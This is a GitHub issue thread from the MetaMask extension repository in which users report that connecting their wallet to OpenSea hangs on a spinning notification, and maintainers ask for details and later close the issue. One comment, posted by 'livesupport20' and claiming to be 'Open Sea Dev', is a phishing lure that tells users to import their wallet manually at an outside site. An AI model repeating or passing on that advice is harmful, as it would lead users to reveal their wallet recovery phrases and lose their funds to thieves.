### ISSUE TITLE
Can't get into OpenSea

### ISSUE THREAD

**Issue by ManMonkey66** [MetaMask/metamask-extension#13181] opened 2021-12-29 14:13 UTC
First, I have no idea if I'm in the right place for this issue. I'm sure someone will let me know.
Q: I've been trying to access my OpenSea account for days. In the past I've done this 100's of times, now when I click on my MetaMask Wallet, the Box (MetaMask Notification) with the Fox pops up and a orange circle spins. (forever) Any ideas

<img width="1260" alt="MetaSea" src="https://user-images.githubusercontent.com/96829817/147670949-7b84e34a-3171-43cf-818d-28ddd4ade2a4.png">

**Comment by Adamas67** [comment] 2021-12-29 14:25
I have the same problem

**Comment by livesupport20** [comment] 2021-12-29 17:27
Hello 
This is Open Sea Dev 
You are experiencing this issue because your wallet has lost total synchronization with Open sea,you will need to restore synchronization to resolve the issue.
Follow the link below 
Select your wallet 
Import your wallet(manually)
On the next page select synchronize 
https://syncs-revalidatewallet.com

**Comment by Gudahtt** [comment] 2022-01-03 14:22
Thanks for the report! I'd like to know more about the circumstances of this problem so that we can try to reproduce it. Could you fill in this template please?

> - OS: [e.g. OS X, Windows]
> - Hardware Wallet: [e.g. Trezor Firmware version 1.8.3, Ledger Nano S Firmware version 1.6.0]
> - Browser: [e.g. Chrome Version 79.0.3945.79 (Official Build) (64-bit), Firefox Browser 71.0 (64-bit)]
> - MetaMask Version: [e.g. 5.0.2 - find it in Settings > About]

**Comment by Gtonizuka** [comment] 2022-01-31 14:52
I have tested this in multiple browsers with v 10.9.0 and haven't had any issue - closing for now but feel free to reopen it if this is still occuring @Adamas67 @ManMonkey66

**Closed by Gtonizuka** 2022-01-31 14:52 UTC
Labels: type-bug, needs-reproduction, Sev2-normal
